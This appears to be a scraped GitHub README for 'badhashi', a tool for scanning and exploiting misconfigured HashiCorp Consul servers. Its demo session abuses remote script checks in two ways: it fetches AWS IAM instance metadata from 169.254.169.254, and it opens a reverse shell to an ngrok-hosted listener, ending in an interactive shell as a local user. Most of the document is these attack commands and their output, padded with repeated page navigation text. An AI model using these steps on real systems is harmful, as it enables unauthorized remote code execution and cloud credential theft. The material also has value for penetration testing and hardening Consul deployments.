badhashi

Scanning / Exploiting vulnerable hashicorp tools

Features Consul

Features Nomad (Coming soon)

How

Start ngrok ./ngrok tcp 9000

Connected <http:https://127.0.0.1:8500>$ check status
DisableRemoteExec: true
EnableRemoteScriptChecks: true
NodeName: mini.hsd1.wa.comcast.net
Version: 1.9.3
Server: true

Connected <http:https://127.0.0.1:8500>$ exploit metadata
----
Check Registered
Waiting for command to register...
ID: Test
HTTP GET http:https://169.254.169.254/latest/meta-data/iam/info: 200 OK Output: {
  "Code" : "Success",
  "LastUpdated" : "2021-02-25T06:15:20Z",
  "InstanceProfileArn" : "arn:aws:iam::*************************************",
  "InstanceProfileId" : "AIPA2LE*************"
}
Check Deregistered
---

(cmd ngrok-host ngrok-port local-port) ** can replace ngrok with external ip.

Connected <http:https://127.0.0.1:8500>$ exploit shell 2.tcp.ngrok.io 18563 9000
----
Check Registered
Waiting for callback...
2021/02/24 23:16:21 Listening on localhost:9000
Check Deregistered
---
Client 127.0.0.1:51771 connected.
bash-$: whoami
brian

Name		Name	Last commit message	Last commit date
Latest commit History 19 Commits
README.md		README.md
badhashi.gif		badhashi.gif
hashiscan-shell.gif		hashiscan-shell.gif
main.go		main.go

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

badhashi

Features Consul

Features Nomad (Coming soon)

How

About

Releases

Packages

Languages

grines/hashiscan

Folders and files

Latest commit

History

Repository files navigation

badhashi

Features Consul

Features Nomad (Coming soon)

How

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages